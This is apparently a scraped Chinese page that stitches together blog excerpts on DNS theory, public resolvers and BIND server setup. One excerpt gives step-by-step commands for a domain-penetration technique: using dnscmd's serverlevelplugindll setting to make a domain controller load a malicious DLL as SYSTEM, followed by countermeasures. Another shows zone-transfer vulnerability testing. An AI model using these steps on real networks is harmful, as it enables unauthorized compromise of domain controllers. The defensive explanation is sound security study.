-
DNS服务器
2018-03-10 21:24:09DNS服务器的原理DNS (Domain Name System) 域名系统的简写它是一种基于tcp/upd的服务,同时监听在TCP和UPD的53号端口。刚开始,网络刚诞生的时候,只有很少的计算机接入网络,而随着个人PC的发展,网络成爆炸性增长...DNS服务器的原理
DNS (Domain Name System) 域名系统的简写
它是一种基于tcp/upd的服务,同时监听在TCP和UPD的53号端口。刚开始,网络刚诞生的时候,只有很少的计算机接入网络,而随着个人PC的发展,网络成爆炸性增长,单纯的IP地址很难记忆,所有有了DNS服务,它可以将ip对应为容易记忆的英文字符,也就是我们现在使用的网址。全球有13台根服务器,而亚洲只有一台位于日本。
为了规范化地址的使用,出现了国际名称地址分配机构,它将域名划分为几个等级(简单说明)
. 根DNS服务器用符号点表示
.com .net .org .cn .tw 一级域名
ibm.com 二级域名
所以我们通常的网址例如www.ibm.com其实是www.ibm.com. 最后面的一个点指向根服务器。
(一)DNS服务器其实就是存放域名和IP对应的数据库文件,那么它的查询类型有哪些?分为两种
1. 递归查询
2. 迭代查询
递归查询,如果A查询不到ibm.com,服务器A会向下一个服务器B查询,直到找到答案返回
迭代查询,如果A没有ibm.com,但是知道B有,就发送给PC,让它去找B
我们的电脑在域名解析时一般采用两种结合的方式,前半段递归(本地),后半段迭代(非本地)
(二)DNS服务器的解析是双向的:
NAME----->ip : 正向解析,根据主机名查找到对应的IP
ip------>FQDN: 反响解析,根据ip查找到对应的域名
DNS服务器里记录这些解析的信息主要通过一些记录类型来实现:
FQDN ---> IP : A A表示对应的是IP地址
IP -----> FQDN : PTR (pointer) 表示对应的是域名
DOMAIN ----->SERVER : NS (Name Server) 域名服务器的名字
DOMAIN------> MTA : MX (Mail eXchanger) 记录邮箱地址,邮件交换器
aliase-----> jerry : CNAME 解析一个别名的正式名称
SOA (Start Of Authority) 一般标明一个域名的主域名服务器
(三)DNS服务器类型:
本地从服务器
本地主服务器
主服务器----辅助名称服务器
一般来讲,从服务是隔一段时间和其他服务器同步,但是它也有通知的责任,只要它的数据发生变化,它就会通知其他从服务器,不管其他从服务器是否变化都会和它同步
(四)什么是域,区域
DNS的解析需要定义一个域,而这个域下有两个子区域,他们都用来名称解析,名称解析分为两类,一个是正向,一个是反向,需要分别定义:
正向需要一个单独的数据文件反向需要一个单独的数据文件
所以说区域是物理概念,它和物理文件一一对应。而域是逻辑概念,它指名了一处“地方”。
# 一个域包含了一个正向区域和反向区域,但是区域里也可以开辟出域,.com里有ibm.com域和区域彼此间没有对应关系,并非一定只有两个区域,如果一个域里面划分出多个域,就不止有两个区域区域传送类型
axfr 完全区域传送-------->传送区域内的所有解析信息
ixfr 部分区域传送-------->只传输变化的内容如果有一个域名新增或者移过来,那么这个信息的修改是有主服务器来做的,而从服务器每隔一段时间会和主服务器同步信息或者说传送信息,这种传送叫区域传送
(五)DNS服务器响应客户端请求解析流程
请求-----> 本地的/etc/hosts # 如果host文件里有解析,那么返回host文件的解析结果,没有下一步
----> 本地DNS缓存 # 查找本地的DNS缓存,如果有,返回结果,没有下一步
----> 找第一台dns服务器 ---->查找缓存 # 查找自己定义的第一个DNS服务器,DNS服务器查找缓存,如果有,返回结果,如有没有,下一步
----> 看看是不是自己负责的域-------> 返回结果 # 第二个DNS正好负责改域,返回结果
↓ 是
不是 # 第二个自己定义的DNS ,没有结果,直接去找根服务器再一步一步往下级域名找
↓找根DNS服务器
# 通过根服务器一步一步往下找的答案返回为权威答案,而缓存返回的都是非权威答案
说明:
/etc/host 可以实现域名重定向,因为它被优先使用缓存名称服务器的目的是为了: 加速,节约带宽 ,它不负责管理区域
**转发器: 仅仅帮用户的请求转发的其他服务器上,实现内外防火墙之间DNS服务器转发数据 -
dns服务器
2013-05-09 13:17:04文章出自:http://www.ha97.com/951.html (总结)推荐Google的DNS解析服务器8.8.8.8 Google的公共DNS解析服务记得是上年年底推出的。...为何我这么钟情于Google的DNS服务器?原因很简文章出自:http://www.ha97.com/951.html
(总结)推荐Google的DNS解析服务器8.8.8.8
Google的公共DNS解析服务记得是上年年底推出的。我用了半年了,非常稳定与快速。现在我配置的所有个人电脑与服务器都是用 8.8.8.8 与8.8.4.4做客户端解析。
为何我这么钟情于Google的DNS服务器?原因很简单,是为了避开电信等ISP的DNS劫持!
DNS(Domain Name System)是域名解析服务器的意思,它在互联网的作用是把域名转换成为网络可以识别的IP地址。当用户在浏览器中输入网址域名时,首先就会访问系统设置的DNS域名解析服务器(通常由ISP运营商如电信、网通提供)。如果该服务器内保存着该域名对应的IP信息,则直接返回该信息供用户访问网站。否则,就会向上级DNS逐层查找该域名的对应数据。
目前国内上网用户普遍使用的是默认DNS服务器,即电信运营商的DNS服务,这带来一个巨大的风险,就是DNS劫持。目前国内电信运营商普遍采用DNS劫持的方法,干扰用户正常上网,例如,当用户访问一个不存在(或者被封)的网站,电信运营商就会把用户劫持到一个满屏都是广告的页面:电信114网站,这个114网站不仅搜索质量低劣,而且广告众多,极大的影响了用户上网的安全性和浏览体验。后来,电信运营商的胆子越来越大,甚至连Google的网站电信都敢劫持,这进一步证明了电信运营商的DNS服务可靠性是多么糟糕。如图所示:
普通用户要使用Google DNS非常简单,因为Google为他们的DNS服务器选择了两个非常简单易记的IP地址:“8.8.8.8”和“8.8.4.4”。用户只要在系统的网络设置中选择这两个地址为DNS服务器即可。
windows 下设置:
对于宽带拨号用户,在“设置”-“网络连接”中找到宽带上网的连接,打开网络连接属性,选择Interner协议( TCP/IP )( win7 与vista的用户请选择TCP/IPv4协议)的属性页里,不要选择自动获取DNS,而要选择“使用下面的DNS服务器地址”,首选DNS服务器和备用DNS服务器分别设置为 8.8.8.8和8.8.4.4,完成后断开网络重新连接上网即可。如图所示:
Linux 下设置:
打开命令终端,分别运行
echo nameserver 8.8.8.8 > /etc/resolv.conf
echo nameserver 8.8.4.4 > /etc/resolv.conf这两行命令直接将8.8.8.8与8.8.4.4写入 Linux 的DNS客户端解析文件resolv.conf里。
Google提供的公共DNS服务与电信网通的不同,当用户输入一个错误的或者不存在的网址的时候,不会像中国电信一般直接弹出一个满屏都是广告的页面,Google公司承诺绝不会重定向或者过滤用户所访问的地址,而且绝无广告。Google的技术雄厚,两个DNS IP地址也很好记,并且不会显示广告。大家还没换的赶快换了吧。
另外,短IP的DNS服务器还有以下这些:
4.3.2.1
4.2.2.1
4.2.2.2
4.2.2.3
4.2.2.4
4.2.2.5
4.2.2.6 -
利用dnscmd在DNS服务器上实现远程加载Dll
2020-11-13 16:16:04CATALOG1.前言2.实现过程3.对抗方式4.参考文章 1.前言 这是一种渗透技巧,并不能算是漏洞。 优势:不用执行psexec等远控程序,利用方式偏冷门。...域渗透——利用dnscmd在DNS服务器上实现远程加载Dll ...1.前言
这是一种渗透技巧,并不能算是漏洞。
优势:不用执行psexec等远控程序,利用方式偏冷门。
劣势:对权限要求比较苛刻(要能够修改sysvol下script文件夹的权限),一般需要即在domain admins组又要在本地的administrators组。2.实现过程
- 定制恶意dll,这种恶意dll必须定义导出函数名:
- DnsPluginInitialize
- DnsPluginCleanup
- DnsPluginQuery
模版-----》https://github.com/3gstudent/Add-Dll-Exports
-
将生成的恶意dll上传到sysvol下的script文件夹内,这一步比较麻烦,因为很多用户即使是域管都有可能没有这个权限。如下图,只有在这台主机上的本地administrators组的用户有这个权限。
下图中builtin\administrators组是一个sql相关的内置用户,第二行是表示认证用户。
可以使用impacket套件的工具获取域控的shell,然后将恶意dll下载到域控上,然后使用copy命令上传到sysvol下的script文件夹。
-
下载dnscmd.exe到当前机器的c:/windows/system32/,这时候已经不需要域控机器的shell了
可用下载地址:
https://github.com/3gstudent/test/blob/master/dnscmd.exe -
下载dnscmd.exe.mui保存在C:\Windows\System32\en-US下
可用下载地址:
https://github.com/3gstudent/test/blob/master/dnscmd.exe.mui -
执行命令:
dnscmd 域控ip /config /serverlevelplugindll \\wlaq.com\SYSVOL\wlaq.com\scripts\你上传的恶意dll
-
使用net use命令共享域控的 admin$。
net use \\10.95.16.96\admin$ /user:"wlaq\admin" "admin"
- 使用sc命令先关闭,后开启dns服务:
sc \\10.95.16.96 stop dns sc \\10.95.16.96 start dns
- 这时候域控主机上就会用system权限加载我们上传的dll。
3.对抗方式
- 保护自己域管理员的hash
- 配置好sysvol文件夹的修改权限,确保只有绝对安全的用户可以修改。
- 记录DNS服务的启动和停止
wevtutil qe “dns server” /rd:true /f:text
ID为2代表DNS服务启动,ID为4代表DNS服务关闭
4.参考文章
-
Linux中搭建DNS服务器
2018-09-18 11:04:32DNS服务器的安装与部署 主从DNS服务器的搭建: 转发DNS服务器的配置 DNS DNS(Domain Name Service)域名解析服务,就是将域名和 ip 之间做相应的转换,利用 TCP 和 UDP 的53号端口DNS系统作用: 正向解析:根据...目录
DNS
DNS(Domain Name Service) 域名解析服务,就是将域名和 ip 之间做相应的转换,利用 TCP 和 UDP 的53号端口
DNS系统作用:- 正向解析:根据域名查找对应的ip地址
- 反向解析:根据ip地址查找对应的域名
DNS服务器的分类:
- 主要名称服务器:存放该区域中相关设置的DNS服务器,其存放的是区域文件的正本数据
- 辅助名称服务器:从其他服务器中复制数据,数据为副本无法修改
- 主控名称服务器:提供趋于数据复制的DNS服务器
- 缓存域名服务器:通过像根或其他服务器查询获得域名到ip的解析关系,将查询结果缓存到本地,提高重复查找速度
域传送漏洞
域传送:是指后备服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。 在主备服务器之间同步数据库,需要使用“DNS域传送”。
域传送漏洞:是由于DNS服务器配置不当,导致匿名用户利用DNS域传送协议获取某个域的所有DNS记录。
域传送漏洞的危害:网络拓扑结构泄露给潜在的攻击者,包括一些安全性较低的内部主机,如测试服务器等。直接加快、助长攻击者的入侵过程。
测试过程:
1) 输入nslookup命令进入交互式shell:nslookup 2) server 命令参数设定查询将要使用的DNS服务器: server dns服务器 3) ls命令列出某个域中的所有域名: ls 域名 4) exit命令退出
域名空间结构
根域(.)
顶级域(顶级域包括组织域和国家/地区顶级域 (net、edu、com、gov、mail、org、cn、uk.... )
--组织顶级域 (net、edu、com、gov、mail、org....)
--国家/地区顶级域(cn、uk...)
二级域名(baidu、taobao...)
三级域名(www、mail...)
组织顶级域名
说明
gov
政府部门
com
商业部门
edu
教育部门
org
民间团体组织
net
网络服务机构
mil
军事部门
国家顶级域名
说明
cn
中国
hk
中国香港
uk
英国
…
DNS解析过程
DNS域名解析过程:
客户机访问域名,先查看自己主机的DNS缓存(有时间限制),如果主机DNS缓存有,则直接访问对应ip。
如果主机DNS缓存没有,则查看本地 hosts文件。
如果 hosts 文件没有,则将该请求发送给主机指定的域名服务器。域名服务器收到请求后,先查询本地的缓存,如果有该纪录项,则域名服务器就直接把查询的结果返回。如果指定的域名服务器的缓存中没有该记录,则进行以下迭代查询。
【迭代查询】
本地域名服务器向根域名服务器查询,根域名服务器告诉它下一步到哪里去查询,然后它在根据结果逐层向下查询,直到得到最终结果。每次它都是以DNS客户机的身份去各个服务器查询,即迭代查询是本地服务器进行的操作。
具体流程描述:
(1)用户主机A先向本地域名服务器B递归查询abc.exmaple.com
(2)B首先尝试使用本地DNS记录查询abc.exmaple.com,若本地不存在abc.example.com的相关记录,则B以DNS客户机的身份发起迭代查询abc.example.com
(3)B向一个根域名服务器C查询abc.example.com
(4)根域名服务器C告诉B下一步到.com顶级域名服务器D去查询,并告知D的IP地址1.2.3.4
(5)B向.com顶级域名服务器D进行查询
(6)D告诉本地域名服务器B,下一步请到.example.com权限服务器E去查询,并告知E的IP地址2.3.4.5
(7)B向.example.com权限服务器E进行查询
(8)E告诉本地域名服务器B所查询域名abc.example.com的主机是否存在,并告知其IP地址3.4.5.6
(9)本地域名服务器B向用户主机A反馈所查询的域名abc.exmaple.com对用的IP地址为3.4.5.6
所以,优先级: 本地DNS缓存 > hosts文件 > DNS服务器
windows中hosts文件存放路径: C:\Windows\System32\drivers\etc\hosts
Linux中hosts文件存放路径: /etc/hosts各种解析记录
类型 说明 A 主机记录,记录域名对应的ip PTR 反向地址解析记录,记录ip对应的域名 CNAME 别名记录 MX 邮箱交换记录 NS 服务器记录 SOA 权威记录 TXT 为记录说明 SRV 列出正在提供特定服务的服务器 AAAA ipv6地址记录 A记录
A (Address) 记录也叫主机记录,是用来指定域名对应的IP地址记录。用户可以将该域名下的网站服务器指向到自己的网页服务器(web server)上。同时也可以设置域名的子域名。通俗来说A记录就是服务器的IP,域名绑定A记录就是告诉DNS,当输入域名的时候给你引导向设置在DNS的A记录所对应的服务器。在命令行下可以通过nslookup -qt=a www.baidu.com来查看A记录。PTR记录
相对于A记录,PTR记录是把IP地址转换为域名
CNAME记录
CNAME记录也称别名记录,它允许你将多个记录映射到同一台计算机上。比如你建了如下几条记录:
我们访问a1(a2,a3).baidu.com的时候,域名解析服务器会返回一个CNAME记录,并且指向a.baidu.com,然后我们的本地电脑会再发送一个请求,请求a.baidu.com的解析,然后域名服务器会返回a.baidu.com的IP地址。
当我们要指向很多的域名到一台电脑上的时候,用CNAME比较方便,就如上面的例子,我们如果服务器更换IP了,我们只要更换 a.baidu.com 的A记录即可。
在命令行下可以使用 nslookup -qt=cname a1.baidu.com 来查看CNAME记录。
MX记录
MX记录的权重对 mail 服务是很重要的,当发送邮件时,Mail 服务器先对域名进行解析,查找 mx 记录。先找权重数最小的服务器(比如说是 10),如果能连通,那么就将发送过去;如果无法连通 mx 记录为 10 的服务器,那么才将邮件发送到权重为 20 的 mail 服务器上。
这里有一个重要的概念,权重 20 的服务器在配置上只是暂时缓存 mail ,当权重 20 的服务器能连通权重为 10 的服务器时,仍会将邮件发送的权重为 10 的 Mail 服务器上。当然,这个机制需要在 Mail 服务器上配置。
在命令行下可以通过 nslookup -qt=mx baidu.com 来查看MX记录。
TXT记录
TXT记录一般是为某条记录设置说明,比如你新建了一条 a.ezloo.com 的TXT记录,TXT记录内容"this is a test TXT record.",然后你用 nslookup -qt=txt a.ezloo.com ,你就能看到"this is a test TXT record"的字样。
除外,TXT还可以用来验证域名的所有,比如你的域名使用了Google的某项服务,Google会要求你建一个TXT记录,然后Google验证你对此域名是否具备管理权限。
在命令行下可以使用 nslookup -qt=txt baidu.com 来查看TXT记录这里讲到TXT记录,我们就要谈谈TXT记录里面的 SPF 了。SPF是 Sender Policy Framework 的缩写,一种以IP地址认证电子邮件发件人身份的技术。 接收邮件方会首先检查域名的SPF记录,来确定发件人的IP地址是否被包含在SPF记录里面,如果在,就认为是一封正确的邮件,否则会认为是一封伪造的邮件进行退回。
SPF可以防止别人伪造你来发邮件,是一个反伪造性邮件的解决方案。当你定义了你域名的SPF记录之后, 接收邮件方会根据你的SPF记录来确定连接过来的IP地址是否被包含在SPF记录里面,如果在,则认为是一封正确的邮件,否则则认为是一封伪造的邮件。
设置正确的 SPF 记录可以提高邮件系统发送外域邮件的成功率,也可以一定程度上防止别人假冒你的域名发邮件。MX记录的作用是给寄信者指明某个域名的邮件服务器有哪些。SPF的作用跟MX相反,它向收信者表明,哪些邮件服务器是经过某个域名认证的可以发送邮件的。
由定义可以看出,SPF的作用主要是反垃圾邮件,主要针对那些发信人伪造域名的垃圾邮件。
AAAA记录
AAAA记录是一个指向IPv6地址的记录。
可以使用 nslookup -qt=aaaa a.ezloo.com 来查看AAAA记录。
NS记录
NS记录是域名服务器记录,用来指定域名由哪台服务器来进行解析。
可以使用 nslookup -qt=ns baidu.com 来查看。
TTL值
TTL=time to live,表示解析记录在DNS服务器中的缓存时间。比如当我们请求解析www.ezloo.com的时候,DNS服务器发现没有该记录,就会向下个NS服务器发出请求,获得记录之后,该记录在DNS服务器上保存TTL的时间长度。当我们再次发出请求解析www.ezloo.com 的时候,DNS服务器直接返回刚才的记录,不去请求NS服务器。TTL的时间长度单位是秒,一般为3600秒SOA记录
定义了该域中的权威名称服务器
SRV记录
列出正在提供特定服务的服务器
DNS服务器的安装与部署
程序所需的包: bind (DNS服务器软件包) 、bind-utils(DNS测试工具,包含dig、host、nslookup等)、bind-chroot(使BIND运行在指定的目录中的安全增强工具)、caching-nameserver(高速缓存DNS服务器的基本配置文件,建议一定安装)
可执行文件所在目录: /usr/sbin/named (Rhel7) /etc/init.d/named (Rhel6)
配置文件所在目录: /etc/named.conf
区域配置文件所在目录:/var/named/xxx.zone- 安装DNS程序: yum -y install bind*
- 修改主配置文件:/etc/named.conf
- 添加并修改区域配置文件 /var/named/xxx.zone
- 修改文件权限: chown named:named /var/named/xxx.zone
- 开启服务,并验证 systemct start named ; nslookup www.xie.com
修改主配置文件: /etc/named.conf
options { listen-on port 53 { any; }; //修改行 listen-on-v6 port 53 { ::1; }; directory "/var/named"; dump-file "/var/named/data/cache_dump.db"; statistics-file "/var/named/data/named_stats.txt"; memstatistics-file "/var/named/data/named_mem_stats.txt"; allow-query { any; }; //修改行 } zone "." IN { //系统自定义的根域服务器,必须要有 type hint; file "named.ca"; }; zone "xie.com." IN{ //自定义的,添加正向解析 type master; //主从DNS file "xie.com.zone"; //指定区域配置文件名,在/var/named/ 目录下 }; zone "10.168.192.in-addr.arpa" IN{ //自定义的,添加反向解析 type master; file "xie.com.zone"; }; zone "mi.com." IN { //添加对另一个域名的解析 type master; file "mi.com.zone" }
在 /var/named/ 目录下分别创建 xie.com.zone 和 mi.com.zone 文件 ,并且如下配置
// xie.com.zone 文件的配置 $TTL 1D @ IN SOA www.xie.com. root.xie.com. ( // @代表本机 0 ; serial 1D ; refresh 1H ; retry 1W ; expire 3H ) ; minimum NS www.xie.com. MX 10 root.xie.com. //邮箱 www IN A 192.168.10.100 //这个必须写在第一条!! web IN A 192.168.10.110 root IN A 192.168.10.120 * IN A 192.168.10.130 //添加一个默认匹配,当配置文件中的都没匹配,则匹配此条 ftp IN CNAME www //给www.xie.com添加一个别名 ftp.xie.com 1 IN PTR web1.xie.com. //添加反向解析记录 192.168.10.1 解析为 web1.xie.com 2 IN PTR web2.xie.com. // mi.com.zone 文件的配置 $TTL 1D @ IN SOA www.mi.com. root.mi.com. ( 0 ; serial 1D ; refresh 1H ; retry 1W ; expire 3H ) ; minimum NS www.mi.com. MX 10 root.mi.com. www IN A 192.168.10.100 web IN A 192.168.10.200
主从DNS服务器的搭建:
主DNS服务器在上面配置的基础上,在主配置文件 /etc/named.conf 中加入下面一行,意思是允许转移
allow-transfer { 192.168.10.10; }; // 允许 从DNS服务器的ip地址
然后从DNS服务器要同步哪个域名的就写哪个zone,我们这里只同步 xie.com 这个域名的 ,同步的文件路径默认是 /var/named/slaves 下
zone "xie.com." IN { type slave; file "slaves/xie.com.zone"; //指定配置文件目录 masters { 192.168.10.124; }; //指定主DNS IP }; zone "10.168.192.in-addr.arpa" IN{ type slave; file "slaves/xie.com.zone"; masters{ 192.168.10.128; }; };
配置完成以后重启 named 服务: systemctl restart named ,然后同步域配置文件: rndc reload
转发DNS服务器的配置
转发DNS服务器就是当你向一个DNS服务器请求DNS解析时,他把DNS请求转发到了另一个DNS服务器上
转发DNS服务器也要求安装bind包: yum -y install bind*
然后修改主配置文件:/etc/named.conf
option{ listen-on port 53 { any; }; #修改 allow-query { any; }; #修改 forwarders { 192.168.10.10; }; # 指定你要把DNS请求转发给哪个DNS服务器 }
-
IP地址,子网掩码、默认网关,DNS服务器之间的联系与区别
2019-06-24 11:44:05IP地址,子网掩码、默认网关,DNS服务器是什么意思? (一) 问题解析 问: IP地址,子网掩码,默认网关,DNS服务器,有什么区别呀?我知道没有IP地址就不能上网,我也知道没设DNS就不能上外网,可它们都有什么功能,... -
DNS 服务器
2016-09-02 21:22:36相关知识域名解析:将主机名自动转换为ip地址。1./etc/hosts (早期单一文件式处理)利用/etc...2.bind (阶层式管理系统)BIND(berkeley internet name domain)伯克利大学开发,目前世界上使用最广泛的域名系统(DNS -
IP地址,子网掩码、默认网关,DNS服务器是什么意思?
2011-11-22 10:55:54IP地址,子网掩码、默认网关,DNS服务器是什么意思? IP地址,子网掩码、默认网关,DNS服务器是什么意思? (一)问题解析 001. 问:IP地址,子网掩码,默认网关,DNS服务器,有什么区别呀?我知道没有IP地址就不能... -
终于有人把域名和DNS服务器给写明白了
2020-05-10 16:39:17终于有人把域名和DNS服务器给写明白了 -
在CentOS 7中使用BIND部署DNS服务器 - 主从DNS服务器
2020-11-07 12:16:13从DNS服务器又称为辅助(备用)服务器,当主DNS服务器因负载过高或出现故障,无法为DNS客户端提供服务时,从DNS服务器将接替主DNS服务器的工作。由于从DNS服务器的数据信息是从主服务器复制而来的,因此从DNS服务器... -
IP.cn - 全国 DNS 服务器 IP 地址汇总 | 公共 DNS 服务器 | DNS 地址
2019-06-13 01:32:15IP.cn - 全国 DNS 服务器 IP 地址汇总 | 公共 DNS 服务器 | DNS 地址 迅速访问本页:dns.ip.cn 公共 DNS 服务器 IP 地址 名称 DNS 服务器 IP 地址 114 DNS 114.114.114.114 114.114.115.115 阿里 ... -
国内常用公共DNS服务器、各省运营商DNS服务器汇总
2016-10-13 09:23:10主题 DNS服务器 服务器 运营商 不知道大家有没有过网络是正常的,QQ可以正常登录、游戏也可以正常玩,但是网页无论如何都打不开。这就是电脑网络设置的DNS服务器有问题,不是其故障就是不工作了。 换了DNS... -
2019年DNS服务器速度测评【DNS速度排名】
2019-06-20 10:33:022019年DNS服务器速度测评【DNS速度排名】 已经进入2019年了,很多喜爱玩游戏的用户都会在网上搜索什么DNS最快、什么dns玩游戏快、什么dns好等等,这些关于dns排名的问题,本站就这些问题进行了整合,最后总结出两大... -
IPV6 DNS服务器地址列表
2017-10-26 11:47:35教育网DNS服务器:北京邮电大学DNS服务器 2001:da8:202:10::36 2001:da8:202:10::37 北京科技大学DNS服务器 2001:da8:208:10::6加入”Google Over IPv6”计划的DNS:Hurricane Electric DNS ordns.he.net -
企业 dns 服务器搭建
2021-04-02 20:19:53企业 dns 服务器搭建 1. dns 的名词解释2. dns 服务的安装与启用3. 高速缓存 dns4. dns 的 正向解析[root@westos_student17 named]# systemctl restart named ##当两个文件中的任何文件内容编写的有问题时,重启服务... -
国内DNS服务器
2018-11-23 06:11:15第一名 114DNS:★★★★★ 114DNS开启DNS高可靠服务时代的大幕。114DNS开始同时为公众提供高速、稳定、可信的DNS递归解析服务;为网站提供强大抗攻击能力的权威智能DNS解析...DNS 服务器 IP 地址: 首选:114.11... -
继DNS服务器做缓存服务器
2018-12-27 12:44:26缓存服务器是提高DNS 解析的过程。我来看看缓存服务器怎么部署...DNS缓存服务器(Caching DNS Server)是一种不负责域名数据维护的DNS服务器。简单来说,缓存服务器就是把用户经常使用到的域名与IP地址的解析记录保... -
Windows Server服务器上DNS服务器配置方法
2018-07-23 14:44:34图解Windows Server服务器上DNS服务器配置 本篇经验将和大家介绍Windows Server服务器上DNS服务器配置的步骤,希望对大家的工作和学习有所帮助! DNS服务器安装 1 打开“添加角色”,安装DNS服务。点击... -
如何搭建DNS服务器
2019-05-09 16:57:41环境:win server 2008 1、 安装DNS服务器 下一步–安装—关闭 2、配置DNS服务器 访问成功 配置物理机DNS为虚拟机的IP,然后物理机访问。 -
搭建DNS服务器
2016-06-16 08:41:21Linux下架设DNS服务器通常是使用Bind程序来实现的。Bind是一款实现DNS服务器的开放源码的软件。DNS即域名系统,主要功能是将人们易于记忆的Domain Name(域名)与不易记忆的IP地址进行转换。下面由我给大家简单介绍... -
Windows DNS服务器策略
2020-06-28 18:22:19Windows 2016开始微软在Windows服务器中引入了针对DNS服务器的策略。可以方便灵活的控制DNS服务器响应客户端的请求。这里举个例子,阻止某个网段的DNS查询。 思路是这样的,定义一个网段,然后在规则中定义对于来自... -
配置DNS服务器
2018-03-01 12:54:32搭建单区域DNS服务器1.1 问题本例要求要求为DNS区域tedu.cn搭建一台DNS服务器,以便用户能通过域名的方式访问网站。测试阶段主要提供以下正向记录:svr7.tedu.cn ---> 192.168.4.7pc207.tedu.cn ---> ... -
Linux,DNS服务器配置
2018-10-30 18:07:23安装bind,bind-chroot,DNS基本配置:找对地,起对名,写对内容 。启动DNS服务器并更改本机DNS服务器地址,测试DNS服务器,易错点分析。 -
centos7配置DNS服务器
2020-06-14 10:35:17centos7上安装DNS服务器可以实现域名与IP的双向解析,即通过域名可以找到主机IP,也可以通过IP找到域名。在postfix搭建邮件服务器中,需要用到DNS正向解析与反向解析,因此DNS服务器大有可为。笔者以前几次试图搭建... -
DNS 服务器选择
2018-11-21 18:48:09DNS 服务器选择 重要的事情写到前面,因为现在是快餐文化,快餐阅读,没有人愿意静下心研究和和阅读了。 本文主要介绍了一些DNS的测试速度,不介意直接拿去使用,如需使用还需要自己测试才行,就算我们找到了最... -
CentOS8 部署DNS服务器
2020-08-19 16:25:10部署域名解析服务器DNS简介bind服务器程序编辑bind主配置文件编辑bind区域配置文件部署DNS主服务器正向解析编辑区域配置文件编辑数据配置文件...从服务器支持密钥认证开启并加载从服务器的密钥认证功能重启DNS服务器... -
FTP服务器及DNS服务器管理
2015-12-27 20:03:46FTP服务器及DNS服务器管理 一.目的: 主要目的是学习FTP服务器和DNS服务器的配置与管理。 二.内容: (1)安装并配置FTP服务器; (2)安装并配置DNS服务器。 三.环境: (1)Windows XP/Windows Server... -
DNS服务器搭建
2016-08-30 18:30:56前言:DNS即 Domian Name System (域名系统)的缩写,它的用处是讲...1.查看DNS服务器是否安装 rpm –qa |grep bind如果没有安装,则需要安装 bind yum install bind 2.查看DNS服务器当前状态 service named